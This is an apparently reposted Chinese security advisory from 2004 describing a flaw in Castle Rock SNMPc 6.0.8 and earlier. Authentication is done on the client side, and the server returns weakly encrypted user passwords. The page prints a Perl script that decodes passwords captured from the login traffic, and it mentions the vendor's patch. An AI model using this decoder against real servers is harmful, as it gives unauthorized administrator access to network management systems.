为了顺应当前形势和更好的发展,黑基网已于9月19日正式更名为【安基网】,域名更换为www.safebase.cn,请卸载旧的APP并安装新的APP,给您带来不便,敬请理解!谢谢

黑基Web安全攻防班
安基网 首页 IT技术 安全攻防 查看内容

Castle Rock公司SNMPc V5 V6两版本惊现漏洞

2004-9-29 20:05| 投稿: security

摘要: 受影响版本   Castle Rock SNMPc 6.0.8 及更早版本  漏洞描述  SNMPc是Castle Rock Computing开发的常规分布式网络管理系统,适用于小型或中型网络高效解...
受影响版本   Castle Rock SNMPc 6.0.8 及更早版本  漏洞描述  SNMPc是Castle Rock Computing开发的常规分布式网络管理系统,适用于小型或中型网络高效解决方案。由于验证协议的缺陷,任何远程用户都可获得管理员权限来访问SNMPc服务器。  由于SNMPc是分布式系统,所以它包含几个组件。服务器端组件以集中计算机和中央数据库形式运行,包括配置、图形拓扑、日志文件和用户信息。用户必须远程登入控制台或JAVA控制台来查看和控制SNMPc系统。远程控制使用的验证方案过于简单,所有的验证都在客户端进行。  在登入阶段,远程控制台把用户名发送到服务器,服务器回复用户数据:用户名、真实名字、电话号码、用户组等。这些信息存在于内部数据库的ntuserdb.dat文件中,其中有经过简单加密的密码,可以很容易显示出来。  示例代码  #!/usr/bin/perl  $str='.YZ[\]^_PQRSTUVWHIJKLMNO@ABCDEFGxyz{|}  ~.pqrstuvwhijklmno`abcdefg................................89:;?01234567()*+,-./ !"#$%&\  '...............................................................  .................................................................'  ;  while()  {   $s="";   if(/^0130 /){   GETIT: {   do {   s/^0130 00 00 // if /^0130/;   s/^[[:xdigit:]]{4} //;   s/ .*$//ms;   $s=$s." ".$_;   last GETIT if ($s =~ / 00/);   } while ()   };   $s=~s/ 00.*$//ms;   $s=~s/ ([[:xdigit:]]{2}) ([[:xdigit:]]{2})/ substr($str,(hex($1)),1).substr($str,(hex($2)),1) /ige;   $s=~s/ ([[:xdigit:]]{2})/ chr(hex($1)) /ige;   print ":$s:\n";   }   }  官方解决方案:  Castle Rock已经发布了SNMPc 6.0.5、SNMPc 6.0.8及SNMPc完整版的补丁程序下载

小编推荐:欲学习电脑技术、系统维护、网络管理、编程开发和安全攻防等高端IT技术,请 点击这里 注册黑基账号,公开课频道价值万元IT培训教程免费学,让您少走弯路、事半功倍,好工作升职加薪!



免责声明:本文由投稿者转载自互联网,版权归原作者所有,文中所述不代表本站观点,若有侵权或转载等不当之处请联系我们处理,让我们一起为维护良好的互联网秩序而努力!联系方式见网站首页右下角。


鲜花

握手

雷人

路过

鸡蛋

相关阅读

最新评论

最新

返回顶部